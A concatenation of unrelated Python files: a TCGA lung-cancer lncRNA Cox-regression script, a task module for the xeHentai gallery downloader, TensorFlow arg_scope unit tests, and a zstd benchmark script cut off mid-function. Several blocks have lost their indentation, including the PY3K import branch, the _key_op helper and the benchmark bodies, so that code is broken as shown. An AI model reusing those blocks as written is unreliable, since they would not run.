            rdiff = mpmath.fabs((res[k] - std[k])/std[k])
            rdiff = mpmath.nstr(rdiff, 3)
        msg.append("{}: {} != {} (rdiff {})".format(k, resrep, stdrep, rdiff))
    if failures:
        assert_(False, "\n".join(msg))
| |
## A script for finding every cox coefficient and pvalue for every LUSC lncRNA in the beta MiTranscriptome data set (normalized counts)

## Load necessary modules
from rpy2 import robjects as ro
import numpy as np
import os
ro.r('library(survival)')
import re

##This call will only work if you are running python from the command line.
##If you are not running from the command line manually type in your paths.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))

f=open(os.path.join(BASE_DIR,'tcga_data','LUSC','clinical','nationwidechildrens.org_clinical_follow_up_v1.0_lusc.txt'))
##get the column indexes needed
columns=f.readline().strip().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
# Skip the two extra header lines that follow the column-name row.
f.readline()
f.readline()
data=[i.split('\t') for i in f]

## A patient can be listed multiple times in the file. The most recent listing (furthest down in the file), contains the most recent
## follow up data. This code checks if the patient has already been loaded into the list, and if so, takes the more recent data.
## This required an empty value in the list initialization.
## Data is: [[Patient ID, time(days), Vital status],[Patient ID, time(days), Vital status],...]
clinical1=[['','','']]
for i in data:
    if clinical1[-1][0]==i[patient_column]:
        # Same patient as the previous row: overwrite with the newer record.
        # The regex check keeps only purely numeric day counts.
        if re.search('^[0-9]+$',i[death_column]):
            clinical1[-1]=[i[patient_column],int(i[death_column]),'Dead']
        elif re.search('^[0-9]+$',i[alive_column]):
            clinical1[-1]=[i[patient_column],int(i[alive_column]),'Alive']
        else:
            pass
    else:
        if re.search('^[0-9]+$',i[death_column]):
            clinical1.append([i[patient_column],int(i[death_column]),'Dead'])
        elif re.search('^[0-9]+$',i[alive_column]):
            clinical1.append([i[patient_column],int(i[alive_column]),'Alive'])
        else:
            pass

## Removing the empty value.
clinical=clinical1[1:]
## Sex and age information were taken from the "clinical_patient" file. A dictionary was created for sex.
more_clinical={}
sex_dict={}
sex_dict['MALE']=0
sex_dict['FEMALE']=1

## The "clinical_patient" file can also contain patients not listed in the follow_up files.
## In these cases the clinical data for these patients gets appended to a new clinical list.
f=open(os.path.join(BASE_DIR,'tcga_data','LUSC','clinical','nationwidechildrens.org_clinical_patient_lusc.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
sex_column=columns.index('gender')
age_column=columns.index('age_at_initial_pathologic_diagnosis')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
clinical4=[]
data=[i.split('\t') for i in f]
for i in data:
    try:
        # NOTE(review): the bare except silently drops rows whose sex or age
        # fields are missing/non-numeric — apparently intentional filtering.
        more_clinical[i[patient_column]]=[0,sex_dict[i[sex_column]],int(i[age_column])]
        if re.search('^[0-9]+$',i[death_column]):
            clinical4.append([i[patient_column],int(i[death_column]),'Dead'])
        elif re.search('^[0-9]+$',i[alive_column]):
            clinical4.append([i[patient_column],int(i[alive_column]),'Alive'])
        else:
            pass
    except:
        pass

new_clinical=[]

##It is possible that the clinical data in the clinical_patient file is more up to date than the follow_up files
##All the clinical data is merged checking which data is the most up to date
for i in clinical4:
    if i[0] not in [j[0] for j in clinical]:
        new_clinical.append(i)
    else:
        # Keep whichever record has the longer follow-up time.
        if i[1]<=clinical[[j[0] for j in clinical].index(i[0])][1]:
            new_clinical.append(clinical[[j[0] for j in clinical].index(i[0])])
        else:
            new_clinical.append(i)

##also do the reverse since clinical can contain patients not included in clinical4
for i in clinical:
    if i[0] not in [j[0] for j in new_clinical]:
        new_clinical.append(i)

## only patients who had a follow up time greater than 0 days are included in the analysis
clinical=[i for i in new_clinical if i[1]>0]
final_clinical=[]

## A new list containing both follow up times and sex and age is constructed.
## Only patients with sex and age information are included.
## Data is [[Patient ID, time (days), vital status, 0, sex, age at diagnosis],...]
for i in clinical:
    if i[0] in more_clinical:
        final_clinical.append(i+more_clinical[i[0]])
##In a separate script I parsed the mitranscriptome.expr.counts.tsv file and extracted the GBM patient and expression values.
##From this file I will load the expression data.
##There are duplicated transcripts and the possibility of a patient having multiple sequencing files.

##create a dictionary to check for duplicated data
lncrna_dict={}

##I have the list of transcripts saved in a file
# NOTE(review): eval() on file contents — acceptable only for trusted local
# files produced by the companion script.
f=open(os.path.join(BASE_DIR,'lncrna','transcripts.txt'))
transcripts=eval(f.read())

f=open(os.path.join(BASE_DIR,'tcga_data','LUSC','lncrna','LUSC.txt'))

##patient list is at the top of the file
patients=f.readline().strip().split()
lncrnas=[[]]*len(patients)
for i,j in zip(transcripts,f):
    # Only the first occurrence of a duplicated transcript is kept.
    if i not in lncrna_dict:
        data=eval(j.strip())
        for index, k in enumerate(data):
            lncrnas[index]=lncrnas[index]+[[i,float(k)]]
        lncrna_dict[i]=''

##create a dictionary mapping patient to all of their lncrna expression data
# Patient barcodes are truncated to 12 characters to merge multiple samples.
patient_dict={}
for index, i in enumerate(patients):
    patient_dict[i[:12]]=patient_dict.get(i[:12],[])+[lncrnas[index]]

##find which patients have complete clinical data, order the data, and average data if necessary
##it's possible there are expression data for patients without clinical data, and clinical data without expression data
##create a new clinical list called clinical_and_files for consistency with previous scripts
clinical_and_files=[]
for i in final_clinical:
    if i[0] in patient_dict:
        clinical_and_files.append(i)

ordered_lncrnas=[]
for i in clinical_and_files:
    temp=[]
    for j in patient_dict[i[0]]:
        temp.append(j)
    if len(temp)==1:
        ordered_lncrnas.append(temp[0])
    else:
        # Multiple sequencing files: average the expression values per
        # transcript.  NOTE(review): zip() here yields a generator on
        # Python 3 but a list on Python 2 — this script is Python 2.
        values=[]
        for k in temp:
            values.append([kk[1] for kk in k])
        ordered_lncrnas.append(zip([z[0] for z in temp[0]],list(sum([np.array(kkk) for kkk in values])/float(len(temp)))))

## Only want lncras that meet an expression cutoff
## It is not known what expression level of lncrnas is needed for function, so a soft value for median was chosen.
## I don't want to perform an analysis with all 0 expression however, so zeros are still counted.
## A cutoff of .1 and no more than a fourth of the patients containing no expression was chosen
final_lncrnas=[[]]*len(ordered_lncrnas)
for i in range(len(ordered_lncrnas[0])):
    temp=[]
    for j in ordered_lncrnas:
        temp.append(j[i])
    count=0
    for k in temp:
        if k[1]==0:
            count+=1
    median=np.median([ii[1] for ii in temp])
    if count<len(ordered_lncrnas)/4.0 and median>.1:
        for index, kk in enumerate(temp):
            final_lncrnas[index]=final_lncrnas[index]+[kk]

## This will write the final lncrnas to a medium sized file ~10-50MB which could be useful for further analyses, this step can be skipped.
f=open(os.path.join(BASE_DIR,'lncrna','cox','LUSC','final_lncrnas.txt'),'w')
for i in final_lncrnas:
    f.write(str(i))
    f.write('\n')
f.close()
##Performing Cox regression on all of the lncrnas in final_lncrnas
death_dic={}
death_dic['Alive']=0
death_dic['Dead']=1

coeffs=[]
pvalues=[]
lncrnas=[]  ##This list tracks the lncrna names
for i in range(len(final_lncrnas[0])):
    kaplan=[]
    lncrnas.append(final_lncrnas[0][i][0])
    for k,j in zip(clinical_and_files,final_lncrnas):  ## These lists contain the clinical information and lncrna data in the same order.
        kaplan.append([k[1],k[2],k[3],k[4],k[5],j[i][1]])

    data=[ii[-1] for ii in kaplan]  ## Grabbing all the lncrna values for the current lncrna being analyzed
    ro.globalenv['expression']=ro.FloatVector(data)
    res=ro.r('round(qnorm((rank(expression, na.last="keep")-0.5)/sum(!is.na(expression))), digit=5)')  ## Perform inverse normal transformation
    inverse_norm=list(res)  ## Convert robject to python list

    ## Prepare the variables for rpy2
    ro.globalenv['lncrna']=ro.FloatVector(inverse_norm)
    ro.globalenv['times']=ro.IntVector([ii[0] for ii in kaplan])
    ro.globalenv['died']=ro.IntVector([death_dic[ii[1]] for ii in kaplan])
    ro.globalenv['sex']=ro.IntVector([ii[3] for ii in kaplan])
    ro.globalenv['age']=ro.IntVector([ii[4] for ii in kaplan])
    res=ro.r('coxph(Surv(times,died) ~ lncrna + sex + age)')  ## Perform Cox regression

    ## Parse the string of the result with python for the lncrna coefficient and pvalue
    # NOTE(review): scraping coxph's printed summary is fragile; the bare
    # except skips lines that do not split into enough fields.
    for entry in str(res).split('\n'):
        try:
            if entry.split()[0]=='lncrna':
                coeff=entry.split()[1]
                pvalue=entry.split()[-1]
                break
        except:
            pass
    coeffs.append(coeff)
    pvalues.append(pvalue)

## This will write the results to a tab delimited file with lncrna name, cox coefficient, and pvalue.
f=open(os.path.join(BASE_DIR,'lncrna','cox','LUSC','coeffs_pvalues.txt'),'w')
for i,j,k in zip(lncrnas,coeffs,pvalues):
    f.write(i)
    f.write('\t')
    f.write(j)
    f.write('\t')
    f.write(k)
    f.write('\n')
f.close()
| |
#!/usr/bin/env python
# coding:utf-8
# Contributor:
# fffonion <fffonion@gmail.com>
import os
import re
import copy
import json
import uuid
import shutil
import zipfile
from threading import RLock
from . import util
from .const import *
from .const import __version__
if PY3K:
from queue import Queue, Empty
else:
from Queue import Queue, Empty
class Task(object):
    """A single gallery download task.

    Tracks the gallery url, user configuration, download state/progress and
    the bookkeeping maps used while fetching individual images.
    """

    def __init__(self, url, cfgdict):
        # Given a config and url, create an instance of Task
        self.url = url
        # Set gallery id and hash by parsing the url
        if url:
            _ = RE_INDEX.findall(url)
            if _:
                self.gid, self.sethash = _[0]
        self.failcode = 0
        self.state = TASK_STATE_WAITING
        self.guid = str(uuid.uuid4())[:8]  # Unique identifier for the task
        self.config = cfgdict
        self.meta = {}
        self.has_ori = False
        self.reload_map = {}  # {url: [reload_url, fname]}
        self.filehash_map = {}  # map same hash to different ids, {url:((id, fname), )}
        self.img_q = None
        self.page_q = None
        self.list_q = None
        self._flist_done = set()  # store id, don't save, will generate when scan
        self._monitor = None
        self._cnt_lock = RLock()  # guards meta['finished'] counter updates
        self._f_lock = RLock()    # guards filesystem writes/copies

    def cleanup(self):
        """Clean up the queues and reload map for finished and failed tasks."""
        if self.state in (TASK_STATE_FINISHED, TASK_STATE_FAILED):
            self.img_q = None
            self.page_q = None
            self.list_q = None
            self.reload_map = {}

    def set_fail(self, code):
        """Clean up all cached meta data when setting the task status to FAILED."""
        self.state = TASK_STATE_FAILED
        self.failcode = code
        # cleanup all we cached
        self.meta = {}

    def migrate_exhentai(self):
        """Reset the url into an exhentai one if the current one is e-hentai
        and put a FAILED task back to the waiting list.

        Returns True if the url was rewritten, False otherwise.
        """
        _ = re.findall("(?:https*://[g\.]*e\-hentai\.org)(.+)", self.url)
        if not _:
            return False
        self.url = "https://exhentai.org%s" % _[0]
        # only a FAILED task is re-queued; other states are preserved
        self.state = TASK_STATE_WAITING if self.state == TASK_STATE_FAILED else self.state
        self.failcode = 0
        return True

    def base_url(self):
        """Find the domain of site url, in which the task lives."""
        return re.findall(RESTR_SITE, self.url)[0]

    def set_reload_url(self, imgurl, reload_url, fname):
        """Record the per-image page url.

        If the same file occurs several times in a gallery, either copy the
        already-downloaded file immediately, or schedule a copy to happen in
        save_file() once the first occurrence finishes downloading.
        """
        if imgurl in self.reload_map:
            fpath = self.get_fpath()
            old_fid = self.get_fname(imgurl)[0]
            old_f = os.path.join(fpath, self.get_fidpad(old_fid))
            this_fid = int(RE_GALLERY.findall(reload_url)[0][1])
            this_f = os.path.join(fpath, self.get_fidpad(this_fid))
            self._f_lock.acquire()
            if os.path.exists(old_f):
                # we can just copy old file if already downloaded
                try:
                    with open(old_f, 'rb') as _of:
                        with open(this_f, 'wb') as _nf:
                            _nf.write(_of.read())
                except Exception as ex:
                    self._f_lock.release()
                    raise ex
                else:
                    self._f_lock.release()
                self._cnt_lock.acquire()
                self.meta['finished'] += 1
                self._cnt_lock.release()
            else:
                # if not downloaded, we will copy them in save_file
                if imgurl not in self.filehash_map:
                    self.filehash_map[imgurl] = []
                self.filehash_map[imgurl].append((this_fid, old_fid))
                self._f_lock.release()
        else:
            self.reload_map[imgurl] = [reload_url, fname]

    def get_reload_url(self, imgurl):
        """Return the page url recorded for imgurl (None for a falsy url)."""
        if not imgurl:
            return
        return self.reload_map[imgurl][0]

    def scan_downloaded(self, scaled = True):
        """Scan the download directory and rebuild the set of finished ids."""
        fpath = self.get_fpath()
        donefile = False
        if os.path.exists(os.path.join(fpath, ".xehdone")) or os.path.exists("%s.zip" % fpath):
            donefile = True
        # can only check un-renamed files
        for fid in range(1, self.meta['total'] + 1):
            fname = os.path.join(fpath, self.get_fidpad(fid))  # id
            if donefile or (os.path.exists(fname) and os.stat(fname).st_size > 0):
                self._flist_done.add(int(fid))
        self.meta['finished'] = len(self._flist_done)
        if self.meta['finished'] == self.meta['total']:
            # BUGFIX: the original used `==` here (a no-op comparison), so a
            # fully-downloaded task was never marked FINISHED on rescan.
            self.state = TASK_STATE_FINISHED

    def queue_wrapper(self, callback, pichash = None, url = None):
        """If the image referenced by url is not finished yet, hand the url
        back to callback so it is re-queued for download.

        ``pichash`` is kept for interface compatibility; only ``url`` is used.
        """
        fhash, fid = RE_GALLERY.findall(url)[0]
        if int(fid) not in self._flist_done:
            callback(url)

    def save_file(self, imgurl, redirect_url, binary):
        """Write image bytes to disk, and materialize any duplicate images
        that were scheduled in set_reload_url()."""
        # TODO: Rlock for finished += 1
        fpath = self.get_fpath()
        self._f_lock.acquire()
        if not os.path.exists(fpath):
            os.mkdir(fpath)
        self._f_lock.release()
        pageurl, fname = self.reload_map[imgurl]
        _ = re.findall("/([^/\?]+)(?:\?|$)", redirect_url)
        if _:  # change it if it's a full image
            fname = _[0]
            self.reload_map[imgurl][1] = fname
        _, fid = RE_GALLERY.findall(pageurl)[0]
        fn = os.path.join(fpath, self.get_fidpad(int(fid)))
        if os.path.exists(fn) and os.stat(fn).st_size > 0:
            # already present and non-empty; nothing to do
            return fn
        self._cnt_lock.acquire()
        self.meta['finished'] += 1
        self._cnt_lock.release()
        self._f_lock.acquire()
        with open(fn, "wb") as f:
            f.write(binary)
        if imgurl in self.filehash_map:
            # write out duplicates of this image scheduled earlier
            for fid, _ in self.filehash_map[imgurl]:
                fn_rep = os.path.join(fpath, self.get_fidpad(fid))
                with open(fn_rep, "wb") as f:
                    f.write(binary)
                self.meta['finished'] += 1
            del self.filehash_map[imgurl]
        self._f_lock.release()

    def get_fname(self, imgurl):
        """Given image url, get file name and the order number for the img."""
        pageurl, fname = self.reload_map[imgurl]  # structure of reload map: k:[v1,v2]
        _, fid = RE_GALLERY.findall(pageurl)[0]  # fid is the order number of pics
        return int(fid), fname

    def get_fpath(self):
        """Get the path storing the task."""
        return os.path.join(self.config['dir'], util.legalpath(self.meta['title']))

    def get_fidpad(self, fid, ext = 'jpg'):
        """Zero-pad fid to the width of the total page count, e.g. 7 -> '007.jpg'."""
        fid = int(fid)
        _ = "%%0%dd.%%s" % (len(str(self.meta['total'])))
        return _ % (fid, ext)

    def rename_fname(self):
        """Rename downloaded files from their padded ids to their final names.

        Returns a list of (src, dst, error) tuples for renames that failed.
        """
        fpath = self.get_fpath()
        tmppath = os.path.join(fpath, RENAME_TMPDIR)
        cnt = 0
        error_list = []
        # we need to track renamed fid's to decide
        # whether to rename into a temp filename or add (1)
        # only need it when rename_ori = True
        done_list = set()
        for h in self.reload_map:
            fid, fname = self.get_fname(h)
            # if we don't need to rename to original name and file type matches
            if not self.config['rename_ori'] and os.path.splitext(fname)[1].lower() == '.jpg':
                continue
            fname_ori = os.path.join(fpath, self.get_fidpad(fid))  # id
            if self.config['rename_ori']:
                if os.path.exists(os.path.join(tmppath, self.get_fidpad(fid))):
                    # if we previously put it into a temporary folder, we need to change fname_ori
                    fname_ori = os.path.join(tmppath, self.get_fidpad(fid))
                fname_to = os.path.join(fpath, util.legalpath(fname))
            else:
                # Q: Why we don't just use id.ext when saving files instead of using
                # id.jpg?
                # A: If former task doesn't download all files, a new task with same gallery
                # will have zero knowledge about file type before scanning all per page,
                # thus can't determine if this id is downloaded, because file type is not
                # necessarily .jpg
                fname_to = os.path.join(fpath, self.get_fidpad(fid, os.path.splitext(fname)[1][1:]))
            while fname_ori != fname_to:
                if os.path.exists(fname_ori):
                    while os.path.exists(fname_to):
                        _base, _ext = os.path.splitext(fname_to)
                        _ = re.findall("\((\d+)\)$", _base)
                        if self.config['rename_ori'] and fname_to not in done_list:
                            # if our auto numbering conflicts with original naming
                            # we move it into a temporary folder
                            # It's safe since this file is same with one of our auto numbering filename,
                            # it could never be conflicted with other files in tmppath
                            if not os.path.exists(tmppath):
                                os.mkdir(tmppath)
                            os.rename(fname_to, os.path.join(tmppath, os.path.split(fname_to)[1]))
                            break
                        if _:  # if ...(1) exists, use ...(2)
                            # BUGFIX: re.sub takes (pattern, repl, string); the
                            # original swapped repl and string (and left a
                            # debug print behind), raising TypeError here.
                            _base = re.sub("\((\d+)\)$", lambda x: "(%d)" % (int(x.group(1)) + 1), _base)
                        else:
                            _base = "%s(1)" % _base
                        fname_to = "".join((_base, _ext))
                    try:
                        os.rename(fname_ori, fname_to)
                    except Exception as ex:
                        error_list.append((os.path.split(fname_ori)[1], os.path.split(fname_to)[1], str(ex)))
                        break
                    if self.config['rename_ori']:
                        done_list.add(fname_to)
                break
            cnt += 1
        if cnt == self.meta['total']:
            # everything renamed; drop a marker file and remove the temp dir
            with open(os.path.join(fpath, ".xehdone"), "w"):
                pass
            try:
                os.rmdir(tmppath)
            except OSError:  # we will leave it undeleted if it's not empty
                pass
        return error_list

    def make_archive(self):
        """Archive the downloaded task as a zip file and remove the folder."""
        dpath = self.get_fpath()
        arc = "%s.zip" % dpath
        if os.path.exists(arc):
            return arc
        with zipfile.ZipFile(arc, 'w') as zipFile:
            zipFile.comment = ("xeHentai Archiver v%s\nTitle:%s\nOriginal URL:%s" % (
                __version__, self.meta['title'], self.url)).encode('utf-8')
            for f in sorted(os.listdir(dpath)):
                fullpath = os.path.join(dpath, f)
                zipFile.write(fullpath, f, zipfile.ZIP_STORED)
        shutil.rmtree(dpath)
        return arc

    def from_dict(self, j):
        """Restore task state from a plain dict (inverse of to_dict)."""
        for k in self.__dict__:
            if k not in j:
                continue
            if k.endswith('_q') and j[k]:
                # queue contents were serialized as plain lists
                setattr(self, k, Queue())
                for e in j[k]:
                    getattr(self, k).put(e, False)
            else:
                setattr(self, k, j[k])
        _ = RE_INDEX.findall(self.url)
        if _:
            self.gid, self.sethash = _[0]
        return self

    def to_dict(self):
        """Serialize task state to a plain dict; queues become lists and
        private (underscore) attributes are skipped."""
        d = dict({k:v for k, v in self.__dict__.items()
             if not k.endswith('_q') and not k.startswith("_")})
        for k in ['img_q', 'page_q', 'list_q']:
            if getattr(self, k):
                d[k] = [e for e in getattr(self, k).queue]
        return d
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""arg_scope tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import arg_scope
from tensorflow.contrib.framework.python.ops import arg_scoped_arguments
from tensorflow.python.platform import test
@add_arg_scope
def func1(*args, **kwargs):
  # Echo back exactly what was passed in, as an (args, kwargs) pair.
  return args, kwargs
@add_arg_scope
def func2(*args, **kwargs):
  # Echo back exactly what was passed in, as an (args, kwargs) pair.
  return args, kwargs
@add_arg_scope
def func3(args, a=None, b=1, c=2):
  """Some cool doc string."""
  # NOTE: the docstring text above is asserted by testDocString.
  return args, a, b, c
def _key_op(op):
return getattr(op, '_key_op', str(op))
class ArgScopeTest(test.TestCase):
  """Tests for arg_scope: scope contents, nesting, reuse and overrides."""

  def testEmptyArgScope(self):
    """An empty arg_scope yields an empty scope dict."""
    with self.test_session():
      with arg_scope([]) as sc:
        self.assertEqual(sc, {})

  def testClearArgScope(self):
    """arg_scope({}) clears the active scope; it is restored on exit."""
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    key_op = _key_op(func1)
    func1_scope = {key_op: func1_kwargs.copy()}
    with self.test_session():
      with arg_scope([func1], a=1, b=None, c=[1]) as sc1:
        self.assertEqual(sc1, func1_scope)
        with arg_scope({}) as sc2:
          self.assertEqual(sc2, {})
        with arg_scope([]) as current_arg_scope:
          self.assertEqual(current_arg_scope, func1_scope)

  def testNonDecorated(self):
    """Scoping an undecorated function raises ValueError."""
    def my_func(t, a=None):
      return (t, a)
    with self.assertRaises(ValueError):
      with arg_scope([my_func], a=1):
        pass

  def testUnexpectedArg(self):
    """A scoped kwarg not accepted by the function raises TypeError."""
    with self.assertRaises(TypeError):
      with arg_scope([func3], d=1):
        func3(1)

  def testCurrentArgScope(self):
    """The scope dict reflects the kwargs set for the scoped function."""
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    key_op = _key_op(func1)
    current_scope = {key_op: func1_kwargs.copy()}
    with self.test_session():
      with arg_scope([func1], a=1, b=None, c=[1]) as scope:
        self.assertDictEqual(scope, current_scope)

  def testArgScopedArguments(self):
    """arg_scoped_arguments() lists the function's scopable kwargs."""
    func3_kwargs = ('a', 'b', 'c')
    # assertEquals is a deprecated alias; use assertEqual.
    self.assertEqual(arg_scoped_arguments(func3), func3_kwargs)

  def testCurrentArgScopeNested(self):
    """Nested scopes merge into a single scope dict."""
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    func2_kwargs = {'b': 2, 'd': [2]}
    key = _key_op
    current_scope = {
        key(func1): func1_kwargs.copy(),
        key(func2): func2_kwargs.copy()
    }
    with self.test_session():
      with arg_scope([func1], a=1, b=None, c=[1]):
        with arg_scope([func2], b=2, d=[2]) as scope:
          self.assertDictEqual(scope, current_scope)

  def testReuseArgScope(self):
    """A captured scope object can be re-entered later."""
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    key_op = _key_op(func1)
    current_scope = {key_op: func1_kwargs.copy()}
    with self.test_session():
      with arg_scope([func1], a=1, b=None, c=[1]) as scope1:
        pass
      with arg_scope(scope1) as scope:
        self.assertDictEqual(scope, current_scope)

  def testReuseArgScopeNested(self):
    """Captured nested scopes re-enter with their full merged contents."""
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    func2_kwargs = {'b': 2, 'd': [2]}
    key = _key_op
    current_scope1 = {key(func1): func1_kwargs.copy()}
    current_scope2 = {
        key(func1): func1_kwargs.copy(),
        key(func2): func2_kwargs.copy()
    }
    with self.test_session():
      with arg_scope([func1], a=1, b=None, c=[1]) as scope1:
        with arg_scope([func2], b=2, d=[2]) as scope2:
          pass
      with arg_scope(scope1):
        with arg_scope([]) as current_arg_scope:
          self.assertDictEqual(current_arg_scope, current_scope1)
      with arg_scope(scope2):
        with arg_scope([]) as current_arg_scope:
          self.assertDictEqual(current_arg_scope, current_scope2)

  def testSimpleArgScope(self):
    """Scoped kwargs are injected into the call."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    with self.test_session():
      with arg_scope([func1], a=1, b=None, c=[1]):
        args, kwargs = func1(0)
        self.assertTupleEqual(args, func1_args)
        self.assertDictEqual(kwargs, func1_kwargs)

  def testSimpleArgScopeWithTuple(self):
    """arg_scope accepts a tuple of functions as well as a list."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    with self.test_session():
      with arg_scope((func1,), a=1, b=None, c=[1]):
        args, kwargs = func1(0)
        self.assertTupleEqual(args, func1_args)
        self.assertDictEqual(kwargs, func1_kwargs)

  def testOverwriteArgScope(self):
    """Explicit call-site kwargs override the scoped defaults."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': 2, 'c': [1]}
    with arg_scope([func1], a=1, b=None, c=[1]):
      args, kwargs = func1(0, b=2)
      self.assertTupleEqual(args, func1_args)
      self.assertDictEqual(kwargs, func1_kwargs)

  def testNestedArgScope(self):
    """An inner scope overrides individual kwargs of the outer scope."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    with arg_scope([func1], a=1, b=None, c=[1]):
      args, kwargs = func1(0)
      self.assertTupleEqual(args, func1_args)
      self.assertDictEqual(kwargs, func1_kwargs)
      func1_kwargs['b'] = 2
      with arg_scope([func1], b=2):
        args, kwargs = func1(0)
        self.assertTupleEqual(args, func1_args)
        self.assertDictEqual(kwargs, func1_kwargs)

  def testSharedArgScope(self):
    """One scope can apply the same kwargs to multiple functions."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    with arg_scope([func1, func2], a=1, b=None, c=[1]):
      args, kwargs = func1(0)
      self.assertTupleEqual(args, func1_args)
      self.assertDictEqual(kwargs, func1_kwargs)
      args, kwargs = func2(0)
      self.assertTupleEqual(args, func1_args)
      self.assertDictEqual(kwargs, func1_kwargs)

  def testSharedArgScopeTuple(self):
    """Shared scope also works when the functions are given as a tuple."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    with arg_scope((func1, func2), a=1, b=None, c=[1]):
      args, kwargs = func1(0)
      self.assertTupleEqual(args, func1_args)
      self.assertDictEqual(kwargs, func1_kwargs)
      args, kwargs = func2(0)
      self.assertTupleEqual(args, func1_args)
      self.assertDictEqual(kwargs, func1_kwargs)

  def testPartiallySharedArgScope(self):
    """Functions can share an outer scope and have private inner scopes."""
    func1_args = (0,)
    func1_kwargs = {'a': 1, 'b': None, 'c': [1]}
    func2_args = (1,)
    func2_kwargs = {'a': 1, 'b': None, 'd': [2]}
    with arg_scope([func1, func2], a=1, b=None):
      with arg_scope([func1], c=[1]):
        with arg_scope([func2], d=[2]):
          args, kwargs = func1(0)
          self.assertTupleEqual(args, func1_args)
          self.assertDictEqual(kwargs, func1_kwargs)
          args, kwargs = func2(1)
          self.assertTupleEqual(args, func2_args)
          self.assertDictEqual(kwargs, func2_kwargs)

  def testDocString(self):
    """add_arg_scope must preserve the wrapped function's docstring."""
    self.assertEqual(func3.__doc__, 'Some cool doc string.')
if __name__ == '__main__':
  # Run all unit tests in this module.
  test.main()
| |
#!/usr/bin/env python
# Copyright (c) 2016-present, Gregory Szorc
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
"""Very hacky script for benchmarking zstd.
Like most benchmarks, results should be treated with skepticism.
"""
import io
import os
import random
import struct
import time
import zlib
import zstandard as zstd
bio = io.BytesIO
def timer(fn, miniter=3, minwall=3.0):
    """Runs fn() multiple times and returns the results.

    Runs for at least ``miniter`` iterations and ``minwall`` wall time.

    Returns a list of (cpu, user, system, wall) tuples, one per call.
    """
    results = []
    count = 0
    # Use a monotonic clock for wall timings so the measurements are immune
    # to system clock adjustments (the original used time.time() and noted
    # "ideally a monotonic clock" in a comment).
    wall_begin = time.monotonic()
    while True:
        wstart = time.monotonic()
        start = os.times()
        fn()
        end = os.times()
        wend = time.monotonic()
        count += 1
        user = end[0] - start[0]
        system = end[1] - start[1]
        cpu = user + system
        wall = wend - wstart
        results.append((cpu, user, system, wall))
        # Ensure we run at least ``miniter`` times.
        if count < miniter:
            continue
        # And for ``minwall`` seconds of total wall time.
        elapsed = wend - wall_begin
        if elapsed < minwall:
            continue
        break
    return results
# Global registry of all benchmark functions, populated by @bench.
BENCHES = []


def bench(
    mode,
    title,
    require_content_size=False,
    simple=False,
    zlib=False,
    threads_arg=False,
    chunks_as_buffer=False,
    decompressed_sizes_arg=False,
    cffi=True,
):
    """Decorator that registers a benchmark function in ``BENCHES``.

    The keyword flags are attached to the function as attributes and are
    consulted later when selecting benchmarks and building their arguments.
    """

    def wrapper(fn):
        if not fn.__name__.startswith(("compress_", "decompress_")):
            raise ValueError(
                "benchmark function must begin with " "compress_ or decompress_"
            )
        attrs = {
            "mode": mode,
            "title": title,
            "require_content_size": require_content_size,
            "simple": simple,
            "zlib": zlib,
            "threads_arg": threads_arg,
            "chunks_as_buffer": chunks_as_buffer,
            "decompressed_sizes_arg": decompressed_sizes_arg,
            "cffi": cffi,
        }
        for name, value in attrs.items():
            setattr(fn, name, value)
        BENCHES.append(fn)
        return fn

    return wrapper
@bench("discrete", "compress() single use zctx")
def compress_one_use(chunks, zparams):
for chunk in chunks:
zctx = zstd.ZstdCompressor(compression_params=zparams)
zctx.compress(chunk)
@bench("discrete", "compress() reuse zctx", simple=True)
def compress_reuse(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
zctx.compress(chunk)
@bench(
"discrete",
"multi_compress_to_buffer() w/ buffer input",
simple=True,
threads_arg=True,
chunks_as_buffer=True,
cffi=False,
)
def compress_multi_compress_to_buffer_buffer(chunks, zparams, threads):
zctx = zstd.ZstdCompressor(compression_params=zparams)
zctx.multi_compress_to_buffer(chunks, threads=threads)
@bench(
"discrete",
"multi_compress_to_buffer() w/ list input",
threads_arg=True,
cffi=False,
)
def compress_multi_compress_to_buffer_list(chunks, zparams, threads):
zctx = zstd.ZstdCompressor(compression_params=zparams)
zctx.multi_compress_to_buffer(chunks, threads=threads)
@bench("discrete", "stream_reader()")
def compress_stream_reader(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
with zctx.stream_reader(chunk) as reader:
while reader.read(16384):
pass
@bench("discrete", "stream_writer()")
def compress_stream_writer(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
b = bio()
with zctx.stream_writer(b) as compressor:
compressor.write(chunk)
@bench("discrete", "stream_writer() w/ input size")
def compress_stream_writer_size(chunks, zparams):
